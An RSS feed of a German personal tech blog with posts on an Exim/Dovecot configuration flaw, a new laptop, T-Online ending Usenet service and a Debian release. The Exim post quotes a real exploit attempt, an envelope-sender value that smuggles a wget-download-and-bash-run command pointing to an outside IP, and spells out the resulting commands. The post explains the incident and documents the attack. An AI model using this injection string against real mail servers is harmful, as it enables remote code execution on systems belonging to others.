<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    
    <title>Aus dem Leben eines Szlauszafs - Bits'n'Bytes</title>
    <link>http://th-h.de/blog/</link>
    <description>Immer eine Handvoll Heu unter der Sznauze.</description>
    <dc:language>en</dc:language>
    <admin:errorReportsTo rdf:resource="mailto:thh@greenmeadow.szaf.org" />
    <generator>Serendipity 1.6.2 - http://www.s9y.org/</generator>
    <managingEditor>thh@inter.net</managingEditor>
<pubDate>Sun, 05 May 2013 09:56:10 GMT</pubDate>

    <image>
        <url>http://th-h.de/blog/templates/default/img/s9y_banner_small.png</url>
        <title>RSS: Aus dem Leben eines Szlauszafs - Bits'n'Bytes - Immer eine Handvoll Heu unter der Sznauze.</title>
        <link>http://th-h.de/blog/</link>
        <width>100</width>
        <height>21</height>
    </image>

<item>
    <title>Vom Advisory zum Exploit binnen eines Tages</title>
    <link>http://th-h.de/blog/archives/1701-Vom-Advisory-zum-Exploit-binnen-eines-Tages.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1701-Vom-Advisory-zum-Exploit-binnen-eines-Tages.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1701</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1701</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Am Freitag, dem dritten Mai, wurde ein &lt;a title=&quot;Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution&quot; href=&quot;http://th-h.de/blog/exit.php?url_id=1912&amp;amp;entry_id=1701&quot;  onmouseover=&quot;window.status=&#039;https://www.redteam-pentesting.de/advisories/rt-sa-2013-001&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Warnhinweis&lt;/a&gt; (&lt;em&gt;Advisory&lt;/em&gt;) auf eine weit verbreitete Fehlkonfiguration in der Kombination von &lt;em&gt;&lt;a title=&quot;Exim Internet Mailer&quot; href=&quot;http://th-h.de/blog/exit.php?url_id=1913&amp;amp;entry_id=1701&quot;  onmouseover=&quot;window.status=&#039;http://www.exim.org/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Exim&lt;/a&gt; &lt;/em&gt;mit &lt;em&gt;&lt;a title=&quot;Dovecot - secure IMAP server&quot; href=&quot;http://th-h.de/blog/exit.php?url_id=1914&amp;amp;entry_id=1701&quot;  onmouseover=&quot;window.status=&#039;http://dovecot.org/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Dovecot&lt;/a&gt; &lt;/em&gt;publiziert: ein offenbar seit 23.10.2009 im Dovecot-Wiki veröffentliches Konfigurationsbeispiel für &lt;em&gt;Exim&lt;/em&gt;, mit dem eingehende E-Mails durch den zu &lt;em&gt;Dovecot &lt;/em&gt;gehörenden LDA &lt;em&gt;deliver &lt;/em&gt;ausgeliefert werden sollen, enthielt auch die Option &amp;#8220;&lt;em&gt;use_shell&lt;/em&gt;&amp;#8221;, die dazu führt, dass der Aufruf insgesamt zur Ausführung an die Shell weitergegeben wird. Das is potentiell unsicher, wie auch die Exim-Dokumentation &lt;a title=&quot;Exim: The pipe transport - How the command is run&quot; href=&quot;http://th-h.de/blog/exit.php?url_id=1915&amp;amp;entry_id=1701&quot;  onmouseover=&quot;window.status=&#039;http://www.exim.org/exim-html-current/doc/html/spec_html/ch-the_pipe_transport.html#SECThowcommandrun&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;erläutert&lt;/a&gt;:&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;Not running the command under a shell (by default) lessens the security risks
in cases when a command from a users filter file is built out of data that was
taken from an incoming message. If a shell is required, it can of course be
explicitly specified as the command to be run. However, there are circumstances
where existing commands (for example, in &lt;em&gt;&lt;span class=&quot;docbook_filename&quot;&gt;.forward&lt;/span&gt; &lt;/em&gt;files) expect to be run
under a shell and cannot easily be modified. To allow for these cases, there is
an option called &lt;span class=&quot;docbook_option&quot;&gt;use_shell&lt;/span&gt;, which changes the way the &lt;span class=&quot;docbook_command&quot;&gt;pipe&lt;/span&gt; transport
works. Instead of breaking up the command line as just described, it expands it
as a single string and passes the result to &lt;em&gt;&lt;span class=&quot;docbook_filename&quot;&gt;/bin/sh&lt;/span&gt;&lt;/em&gt;. The
&lt;span class=&quot;docbook_option&quot;&gt;restrict_to_path&lt;/span&gt; option and the $pipe_addresses facility cannot be used
with &lt;span class=&quot;docbook_option&quot;&gt;use_shell&lt;/span&gt;, and the whole mechanism is inherently less secure.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Wenn es jemandem gelingt, ausführbaren Code in diesen Aufruf einzuschleusen, kann er fremden Code mit den Rechten von Exim ausführen, die im Moment der Auslieferung von Mail mit dem LDA &lt;em&gt;deliver&lt;/em&gt; bestenfalls Zugriff auf alle Mailboxen ermöglichen und bei leichtsinniger Konfiguration - die im Dovecot-Wiki als eine Konfigurationsmöglichkeit ausdrücklich genannt wird! - schlimmstenfalls sogar &lt;em&gt;root&lt;/em&gt; sind. Und dieses Einschleusen ist ausgesprochen einfach, enthält der Aufruf von &lt;em&gt;deliver&lt;/em&gt; doch u.a. den Absender der E-Mail, den sog. &lt;em&gt;Envelope-From&lt;/em&gt; (oder auch &lt;em&gt;Return-Path&lt;/em&gt;), bspw. so:&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;command = /usr/local/libexec/dovecot/dovecot-lda -d $local_part@$domain&amp;#160; -f $sender_address &lt;/font&gt;&lt;br /&gt;&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;&lt;em&gt;$sender_address&lt;/em&gt; ist hier der problematische Parameter, denn diesen Parameter kann der Absender der E-Mail frei setzen. Durch die Option &lt;em&gt;use_shell&lt;/em&gt; wird der obige Aufruf nach Ersatz der Variablen ohne jede Modifikation komplett an die Shell übergeben und ggf. entsprechender Code ausgeführt.&lt;/p&gt; 
&lt;p&gt;Am 02.05.2013 wurde das Beispiel im Wiki für &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1916&amp;amp;entry_id=1701&quot;  onmouseover=&quot;window.status=&#039;http://wiki1.dovecot.org/LDA/Exim?action=diff&amp;amp;amp;rev2=17&amp;amp;amp;rev1=16&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Änderung am 02.05.2013&quot;&gt;Dovecot 1.x&lt;/a&gt; und auch in der Dokumentation für &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1917&amp;amp;entry_id=1701&quot;  onmouseover=&quot;window.status=&#039;http://wiki2.dovecot.org/LDA/Exim?action=diff&amp;amp;amp;rev2=22&amp;amp;amp;rev1=21&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Änderung am 02.05.2013&quot;&gt;Dovecot 2.x&lt;/a&gt; berichtigt, am 03.05.2013 wurde das Advisoy veröffentlicht.&lt;br /&gt;&lt;/p&gt; &lt;p&gt;Und schon am Abend des Folgetages flog mir auf einem meiner Server folgende - ansonsten notwendige Header und vor allen auch einen Inhalt nicht enthaltende - E-Mail zu, die das Beispiel für einen Exploit aus dem Advisory abgewandelt übernommen hat:&lt;br /&gt;&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;Return-path: &amp;lt;red`wget${IFS}178.218.211.118/b${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com&amp;gt;&lt;br /&gt;Envelope-to: postmaster@greenmeadow.szaf.org&lt;br /&gt;Delivery-date: Sat, 04 May 2013 21:57:19 +0200&lt;br /&gt;Received: from [178.218.211.118] (helo=abcde.com)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; by greenmeadow.szaf.org with esmtp (Exim 4.72)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; (envelope-from &amp;lt;red`wget${IFS}178.218.211.118/b${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com&amp;gt;)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; id 1UYia4-000387-Es&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; for postmaster@greenmeadow.szaf.org; Sat, 04 May 2013 21:57:19 +0200&lt;br /&gt;Subject: test &lt;br /&gt;&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Die oben gezeigte problematische Konfiguration würde dann dazu führen, dass bei der Auslieferung der Mail die beiden folgenden Befehle mit den Rechten des Mailservers ausgeführt würden:&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;wget 178.218.211.118/b -O /tmp/a.pl&lt;br /&gt;bash /tmp/a.pl&lt;/font&gt; &lt;br /&gt;&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Es würde also die Datei &lt;em&gt;b&lt;/em&gt; von der Maschine heruntergeladen und in der Datei &lt;em&gt;a.pl&lt;/em&gt; im Verzeichnis &lt;em&gt;/tmp&lt;/em&gt; gespeichert und dann ausgeführt.&lt;br /&gt; &lt;/p&gt; 
&lt;p&gt;Glücklicherweise verwende ich zwar sowohl Exim als auch Dovecot, aber in einer anderen Konfiguration, so dass dieser Versuch eines Exploits kein Problem darstellte, aber man merkt einmal wieder, wie schnell nahc der Veröffentlichung von Advisories man von solchen Versuchen, bestehende Programm- oder Konfigurationsfehler auszunutzen, betroffen wird.&lt;/p&gt; 
&lt;p&gt;(Als ich mich damit näher beschäftigt habe, war die o.g. Datei übrigens bereits nicht mehr aufrufbar.)&lt;br /&gt;&lt;/p&gt; 
    </content:encoded>

    <pubDate>Sun, 05 May 2013 11:29:31 +0200</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1701-guid.html</guid>
    <category>dovecot</category>
<category>e-mail</category>
<category>exim</category>
<category>security</category>

</item>
<item>
    <title>Landroval - ein neuer Laptop</title>
    <link>http://th-h.de/blog/archives/1691-Landroval-ein-neuer-Laptop.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1691-Landroval-ein-neuer-Laptop.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1691</wfw:comment>

    <slash:comments>2</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1691</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt; &lt;/p&gt; 
&lt;div class=&quot;serendipity_imageComment_right&quot; style=&quot;width: 104px;&quot;&gt; 
&lt;div class=&quot;serendipity_imageComment_img&quot;&gt;&lt;a class=&quot;serendipity_image_link&quot; href=&quot;http://th-h.de/blog/uploads/landroval-2011-07-17-01.jpg&quot; onmouseover=&quot;return overlib(&#039;&lt;img src=/blog/uploads/landroval-2011-07-17-01.jpg&gt;&#039;, WIDTH, 1, HEIGHT, 1);&quot; onmouseout=&quot;return nd();&quot; &gt;&lt;!-- s9ymdb:395 --&gt;&lt;img width=&quot;104&quot; height=&quot;110&quot; class=&quot;serendipity_image_right&quot; src=&quot;http://th-h.de/blog/uploads/landroval-2011-07-17-01.serendipityThumb.jpg&quot;    /&gt;&lt;/a&gt;&lt;/div&gt; 
&lt;div class=&quot;serendipity_imageComment_txt&quot;&gt;&lt;a href=&quot;/me/rechner.php#landroval&quot;&gt;Landroval&lt;/a&gt; sieht neben allem anderen auch noch gut aus.&lt;/div&gt; 
&lt;/div&gt; 
&lt;p&gt;Es war mal wieder Zeit für eine Erneuerung im hiesigen Rechnerpark, und 
so habe ich mir nach längerem Überlegen einen neuen Laptop gegönnt, der 
den gut drei Jahre alten Vorgänger ablösen soll - und gestern wurde er 
geliefert und ist mittlerweile schon fast vollständig eingerichtet. &lt;img src=&quot;http://th-h.de/blog/templates/default/img/emoticons/smile.png&quot; alt=&quot;:-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;/p&gt; 
&lt;p&gt;In gewisser Weise ist das ein Novum - ich glaube nämlich, es ist das erste Mal, daß ein Gerät drei Jahre gehalten hat, ohne in irgendeiner Weise auszufallen. Der Vorgänger des jetzt in den Ruhestand geschickten Rechners hat nach ziemlich genau drei Jahren (wohl aufgrund einer Beschädigung am Mainboard) begonnen, regelmäßig einzufrieren, der Vor-Vorgänger wurde nach nur einem Jahr Opfer meiner Ungeschicklichkeit und eines noch recht vollen Glases guten Weins, und dessen Vorgänger wiederum zeigte nach gut vier Jahren sehr intensiver Nutzung massive Abnutzungen an der Hardware (gebrochene Displayscharniere und andere unschöne Dinge), außerdem entsprach er natürlich nicht mehr dem aktuellen Stand der Technik.
&lt;/p&gt; 
&lt;p&gt;Und das ist auch direkt das passende Stichwort: auch wenn der bisherige Laptop &amp;#8220;noch gut war&amp;#8221;, der neue ist viel besser. Eine flinkere CPU, mehr Speicher, ein aktuelles Betriebssystem, die eingebaute UMTS-Karte und sogar ein nicht nur großer - im Sinne von &amp;#8220;breit&amp;#8221; -, sondern auch ausreichend hoher Bildschirm machen beim Arbeiten wieder mehr Freude.&lt;/p&gt; 
&lt;p&gt;Entschieden habe ich mich erneut für einen Thinkpad (ehemals IBM, jetzt seit Jahren 
schon von Lenovo) entschlossen, diesmal einen T520 mit einigen Extras, und zum ersten Mal mit Windows 7 in der 64bit-Variante als Betriebssystem. Die beiden Vorgänger waren zwar auch Thinkpads (T61 und R52), liefen aber noch unter Windows XP. In der Namensgebung habe ich mich am bisherigen Schema orientiert, nachdem meine privaten Rechner in der Regel Namen aus Tolkiens Werk, ersatzweise generische Bezeichnungen, erhalten (tragbare Rechner: Vögel oder Insekten, Desktops: Drachen).&lt;/p&gt; 
&lt;p&gt;Auf meiner Homepage findet sich eine &lt;a title=&quot;Meine Rechner&quot; href=&quot;/me/rechner.php&quot;&gt;Übersicht&lt;/a&gt; der derzeit in Betrieb befindlichen Rechner (und deren Vorgänger) mit den technischen Daten.&lt;br /&gt;&lt;/p&gt;  
    </content:encoded>

    <pubDate>Sun, 17 Jul 2011 18:06:48 +0200</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1691-guid.html</guid>
    
</item>
<item>
    <title>Goodbye, news.t-online.de</title>
    <link>http://th-h.de/blog/archives/1685-Goodbye,-news.t-online.de.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1685-Goodbye,-news.t-online.de.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1685</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1685</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
      
    </content:encoded>

    <pubDate>Sun, 10 Apr 2011 16:23:00 +0200</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1685-guid.html</guid>
    <category>usenet</category>

</item>
<item>
    <title>news.t-online.de: &quot;peering termination&quot;</title>
    <link>http://th-h.de/blog/archives/1684-news.t-online.de-peering-termination.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1684-news.t-online.de-peering-termination.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1684</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1684</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Wie ich &lt;a title=&quot;T-Online verabschiedet sich vom Usenet&quot; href=&quot;http://th-h.de/blog/archives/1681-T-Online-verabschiedet-sich-vom-Usenet.html&quot;&gt;bereits berichtete&lt;/a&gt;, will T-Online den Newsserverbetrieb zum Monatsende einstellen. Entsprechende Informationen gingen jetzt zwar immer noch nicht an die Benutzer und Kunden, aber immerhin an die Peers (also die Betreiber der Newsserver, die Postings mit news.t-online.de austauschen):&lt;/p&gt;
&lt;blockquote dir=&quot;ltr&quot; style=&quot;margin-right: 0px&quot;&gt;
&lt;p&gt;To: [...]&lt;br /&gt;Subject: peering termination newsfeedXX.sul.t-online.de&lt;br /&gt;From: T-Online Newsmaster [...]&lt;br /&gt;Date: Mon, 07 Mar 2011 10:00:09 +0100&lt;br /&gt;User-Agent: Mutt/1.5.20 (2009-06-14)&lt;/p&gt;
&lt;p&gt;Hi,&lt;br /&gt;&lt;br /&gt;German Telekom has decided to end its usenet service&lt;br /&gt;&lt;br /&gt;&amp;#160;news.t-online.de/news.t-online.com&lt;br /&gt;&lt;br /&gt;Therefore all usenet peerings will be terminated end of March 2011.&lt;br /&gt;&lt;br /&gt;We advise you to remove T-Online (newsfeedXX.sul.t-online.de) from your configuration by 31st of March.&lt;br /&gt;&lt;br /&gt;Thank you for peering with us over the years.&lt;br /&gt;&lt;br /&gt;Bye,&lt;br /&gt;&amp;#160; newsmaster[...]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Mit diesen dürren Worten endet also eine Ära ...&lt;/p&gt;  
    </content:encoded>

    <pubDate>Mon, 07 Mar 2011 13:37:38 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1684-guid.html</guid>
    <category>usenet</category>

</item>
<item>
    <title>Alternativen für die Nutzer von news.t-online.de</title>
    <link>http://th-h.de/blog/archives/1683-Alternativen-fuer-die-Nutzer-von-news.t-online.de.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1683-Alternativen-fuer-die-Nutzer-von-news.t-online.de.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1683</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1683</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
      
    </content:encoded>

    <pubDate>Tue, 22 Feb 2011 21:59:00 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1683-guid.html</guid>
    <category>usenet</category>

</item>
<item>
    <title>T-Online verabschiedet sich vom Usenet</title>
    <link>http://th-h.de/blog/archives/1681-T-Online-verabschiedet-sich-vom-Usenet.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1681-T-Online-verabschiedet-sich-vom-Usenet.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1681</wfw:comment>

    <slash:comments>2</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1681</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;... oder: Ein Tod auf Raten.&lt;/p&gt; 
&lt;p&gt;T-Online war - unbeschadet verschiedener Ein- und Ausgliederungen und Umbenennungen - lange Jahre ein besonderer Provider. Nicht nur, weil man immer etwas teurer war (und ist) als der Rest; nicht nur, weil die Technik etwas zuverlässiger, der Support etwas kompetenter war (oder wirkte?), man war m.W. der einzige große und jedenfalls der letzte mir bekannte relevante Anbieter, der sich für den Kundensupport eine eigene Usenet-Hierarchie hielt: &lt;em&gt;t-online.*&lt;/em&gt;, betreut von einem ausgesprochen kompetenten und überdurchschnittlich netzaffinen Team von Mitarbeitern, dem sagenumwobenen &lt;em&gt;T-Online-Team&lt;/em&gt;. In mühevoller Kleinarbeit wurden neben den weithin bekannten Kommunikationskanälen (Hotline, T-Punkt, etc.) wichtige Informationen weitergegeben, FAQs zusammengestellt und nicht zuletzt auch Anfragen und Probleme von einzelnen Nutzern bearbeitet; dieses Wissen, notfalls einen kompetenten Ansprechpartner erreichen zu können, der auch &lt;strong&gt;wirklich&lt;/strong&gt; erreichbar ist, der sich tatsächlich um mein Anliegen kümmert und entsprechende Rückmeldung gibt, war lange Jahre &lt;strong&gt;der&lt;/strong&gt; ausschlaggebende Grund für mich, einen anderen Anbieter gar nicht erst in Betracht zu ziehen. Dazu kam die besondere Gabe, die Balance zu halten zwischen offizieller Kundenkommunikation und persönlichen Smalltalk im Netz, eine offensichtlich über Jahre und Jahrzehnte gewachsene Kenntnis der Materie und der Umgansgformen im Netz und ein wenn möglich augenzwinkernd-scherzhafter, wenn nötig aber auch knallharter Ton - sozusagen das Optimum des User-to-User-Supports, den man in Newsgroups und Foren erwartet, aber mit kompetenten Profis, die von &amp;#8220;innen&amp;#8221; kommen und vor allem auch Zugriff auf die notwendigen Daten und interne Kontakte zur Weitergabe der Anliegen an die richtigen Stellen haben.&lt;/p&gt; 
&lt;p&gt;Über die Jahre konnte man dann schon Änderungen spüren: Offenbar gab es Zugriff auf immer weniger interne Systeme, zunehmend konnten Fragen von Nutzern nicht direkt beantwortet, sondern diese nur noch an die Hotline verwiesen werden - aber immerhin mit konkreten Hinweisen, was man dem Mitarbeiter dort am besten sagen solle. Zunehmend hatte man auch den Eindruck, daß die Kontakte nach innen schlechter wurden, interne Weitergaben von Nutzeranliegen nicht mehr den unmittelbaren Erfolg aus früheren Zeiten nach sich zogen. Parallel wurden dann Supportforen im Web aufgebaut, die dasselbe Team betreute, die aber vom Handling selbst für ein Webforum erstaunlich schlecht nutzbar waren und die natürlichen nicht mehr den besonderen Geist der Newsgroups atmeten.&lt;/p&gt; 
&lt;p&gt;Ende 2009 dann der Paukenschlag: Die internen Newsgroups von T-Online werden zugunsten der Supportforen geschlossen. Ein harter Schlag, ein schwerer Abschied - wie sich herausstellte offenbar nicht nur für die verbliebenen Nutzer, denn vor allem die Mitarbeiter mussten offenbar gehen. Die vorletzte offizielle Verlautbarung möchte ich hier kurz dokumentieren:&lt;/p&gt; 
&lt;blockquote&gt;Liebe Nutzerinnen und Nutzer der t-online.*-Newsgroups,&lt;br /&gt;&lt;br /&gt;leider müssen wir Euch mitteilen, dass diese Newsgroups in Kürze&lt;br /&gt;geschlossen werden. Der geplante Termin ist Montag, der 30.11.2009.&lt;br /&gt;&lt;br /&gt;Selbstverständlich könnt Ihr auch weiterhin Fragen zu allen Themen&lt;br /&gt;rund um die Internet-Dienste der Telekom stellen und Euch wie gewohnt&lt;br /&gt;an regen Diskussionen mit unseren Moderatoren und anderen Usern&lt;br /&gt;beteiligen. Hierzu bieten wir über das Hilfe-Portal der Telekom unsere&lt;br /&gt;Service-Foren an. Diese sind auf der Seite &amp;lt;http://hilfe.telekom.de/&amp;gt;&lt;br /&gt;unter &amp;gt; Kontakt &amp;gt; Service-Foren integriert und über den folgenden URL&lt;br /&gt;direkt erreichbar:&lt;br /&gt;&lt;br /&gt;&amp;lt;http://www.t-online.de/foren&amp;gt;&lt;br /&gt;&lt;br /&gt;Der Hintergrund für diese Maßnahme ist, dass wir die qualitativ hoch-&lt;br /&gt;wertigen Diskussionen und Hilfestellungen, die in den Newsgroups&lt;br /&gt;einerseits und den Service-Foren andererseits stattfinden, zukünftig&lt;br /&gt;nicht weiter zerstückeln und allen unseren Kunden zugänglich machen&lt;br /&gt;wollen. - Außerdem möchten wir natürlich auch den Aufwand für die&lt;br /&gt;doppelte Moderation reduzieren.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Der Newsserver der Telekom wird selbstverständlich weiter betrieben,&lt;br /&gt;Ihr müsst also keine Änderungen an Eurem Newsreader vornehmen:&lt;br /&gt;Alle anderen Newsgroups werden auch weiterhin bereitgestellt.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Für Eure persönliche Unterstützung in zahlreichen Diskussionen hier&lt;br /&gt;in den Newsgroups, die in weiten Teilen sehr zur Verbesserung unserer&lt;br /&gt;Produkte beigetragen haben, bedanken wir uns herzlich und würden uns&lt;br /&gt;sehr freuen, dieses konstruktive Miteinander auch in den Service-Foren&lt;br /&gt;gemeinsam fortzusetzen.&lt;br /&gt;&lt;br /&gt;Vielen Dank für Euer Verständnis.&lt;br /&gt;&lt;br /&gt;Herzliche Grüße&lt;br /&gt;Euer T-Home-Team &lt;br /&gt;&lt;/blockquote&gt; 
&lt;p&gt;&lt;em&gt;(Hervorhebung von mir.)&lt;/em&gt;&lt;br /&gt;&lt;/p&gt; &lt;p&gt;Und nun, knappe anderthalb Jahre später, tritt das ein, was damals schon befürchtet wurde: auf die Schließung der internen Newsgroups folgt die Abschaltung des Newsservers (bzw. der Newsserverfarm). Auf den &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1859&amp;amp;entry_id=1681&quot; title=&quot;http://hilfe.telekom.de/hsp/cms/content/HSP/de/3378/FAQ/faq-45858187&quot;  onmouseover=&quot;window.status=&#039;http://hilfe.telekom.de/hsp/cms/content/HSP/de/3378/FAQ/faq-45858187&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Hilfeseiten der Telekom&lt;/a&gt; kann man nun lesen:&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;Da die Bedeutung des Usenet als Kommunikationsplattform in den letzten Jahren stark abgenommen hat - v. a. zugunsten von &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1860&amp;amp;entry_id=1681&quot;  onmouseover=&quot;window.status=&#039;http://hilfe.telekom.de/hsp/cms/content/HSP/de/8442/Startseite/Lexikon/Lexikon/Foren&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; class=&quot;hilite&quot; target=&quot;Lexikon&quot; title=&quot;Im Lexikon nachschlagen&quot;&gt;Foren&lt;/a&gt;
 - wird die Telekom den bisher für unsere Kunden betriebenen Newsserver 
news.t-online.de voraussichtlich zum 31.03.2011 abschalten. &lt;br /&gt;&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Eine Information der Nutzer ist offenbar nicht vorgesehen - es gibt ja auch keine passenden Newsgroups mehr ... (Nein, das ist nicht der Grund; eine Information per E-Mail wäre möglich, sogar gezielt nur an diejenigen Nutzer, die den Newsserver bereits mindestens einmal genutzt haben, denn darüber bestehen Aufzeichnungen - schließlich erfolgt bei der Erstnutzung eine Begrüßung per E-Mail, was zwingend voraussetzt, daß gespeichert wird, ob der betreffende Account den Newsserver schon einmal benutzt hat.) Danke daher für den &lt;a title=&quot;GoogleGroups&quot; href=&quot;http://th-h.de/blog/exit.php?url_id=1861&amp;amp;entry_id=1681&quot;  onmouseover=&quot;window.status=&#039;https://groups.google.com/group/de.comm.provider.t-online/browse_frm/thread/6a9c99a928ed4b2c&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Hinweis&lt;/a&gt; in &lt;em&gt;de.comm.provider.t-online&lt;/em&gt;!&lt;/p&gt; 
&lt;p&gt;Man muß sich das vorstellen: der seit vielen, vielen Jahren von der Nutzer- bzw. Beitragsanzahl im deutschsprachigen Usenet zweitgrößte Server wird abgeschaltet, nachdem man vorher den über gut 10 Jahre bewährten Support beendet hat. Das ist nicht nur ein schwerer Schlag für das deutschsprachige Usenet, das ist vor allem in Zeiten, in denen Unternehmen zunehmend das &amp;#8220;social web&amp;#8221; und die Wichtigkeit nicht-offizieller Supportkanäle für &amp;#8220;Power-User&amp;#8221; (über Twitter, Facebook und Co.) erkennen, um positive Multiplikatoren zu gewinnen, für mich kaum nachvollziehbar.&lt;br /&gt;&lt;/p&gt; 
    </content:encoded>

    <pubDate>Sat, 19 Feb 2011 10:30:11 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1681-guid.html</guid>
    <category>usenet</category>

</item>
<item>
    <title>Debian 6.0 Squeeze ist released</title>
    <link>http://th-h.de/blog/archives/1679-Debian-6.0-Squeeze-ist-released.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1679-Debian-6.0-Squeeze-ist-released.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1679</wfw:comment>

    <slash:comments>3</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1679</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Seit diesem Wochenende steht jetzt - wie geplant und angekündigt - die aktuelle und brandneue Debian-Version 6.0 &amp;#8220;Squeeze&amp;#8221; &lt;a title=&quot;Debian 6.0 Squeeze veröffentlicht&quot; href=&quot;http://th-h.de/blog/exit.php?url_id=1854&amp;amp;entry_id=1679&quot;  onmouseover=&quot;window.status=&#039;http://www.debian.org/News/2011/20110205a&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;zur Verfügung&lt;/a&gt;. Der Release-Prozess war in diesem Jahr nicht nur von einer Vielzahl von Release-Parties, sondern auch von einer fortlaufenden Berichterstattung via Twitter bzw. identi.ca begleitet.&lt;/p&gt;
